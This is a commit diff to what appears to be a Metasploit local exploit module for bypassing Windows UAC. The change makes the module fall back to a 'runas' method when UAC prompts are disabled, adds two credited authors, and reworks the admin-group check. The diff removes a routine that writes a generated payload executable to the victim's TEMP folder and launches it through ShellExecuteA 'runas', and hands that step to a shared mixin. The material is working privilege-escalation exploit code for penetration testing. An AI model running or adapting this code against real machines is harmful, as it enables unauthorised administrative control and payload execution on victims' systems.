Fall back to runas if UAC disabled
parent
8f720ef766
commit
a9fee9c022
|
@ -14,6 +14,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
include Post::File
|
||||
include Post::Windows::Priv
|
||||
include Post::Windows::ReflectiveDLLInjection
|
||||
include Post::Windows::Runas
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
|
@ -33,7 +34,9 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
|
||||
'mitnick',
|
||||
'mubix', # Port to local exploit
|
||||
'Ben Campbell' # In memory technique
|
||||
'Ben Campbell', # In memory technique
|
||||
'Lesage', # Win8+ updates
|
||||
'OJ Reeves' # Win 8+ updates
|
||||
],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
|
@ -76,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_good('BypassUAC can bypass this setting, continuing...')
|
||||
when UAC_NO_PROMPT
|
||||
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
|
||||
runas_method(env_vars['TEMP'])
|
||||
shell_execute_exe
|
||||
return
|
||||
end
|
||||
|
||||
|
@ -142,20 +145,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
end
|
||||
|
||||
def runas_method(temp_dir)
|
||||
payload = generate_payload_exe
|
||||
payload_filename = Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
|
||||
temp_exe = "#{temp_dir}\\#{payload_filename}"
|
||||
|
||||
print_status("Uploading payload: #{temp_exe}")
|
||||
write_file(temp_exe, payload)
|
||||
register_file_for_cleanup(temp_exe)
|
||||
|
||||
print_status("Executing payload: #{temp_exe}")
|
||||
session.railgun.shell32.ShellExecuteA(nil, 'runas', temp_exe, nil, nil, 5)
|
||||
print_status('Payload executed.')
|
||||
end
|
||||
|
||||
def run_injection(pid, dll_path, file_paths)
|
||||
vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
|
||||
begin
|
||||
|
@ -226,9 +215,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
if is_uac_enabled?
|
||||
print_status('UAC is Enabled, checking level...')
|
||||
else
|
||||
if is_in_admin_group?
|
||||
fail_with(Exploit::Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
|
||||
else
|
||||
unless is_in_admin_group?
|
||||
fail_with(Exploit::Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue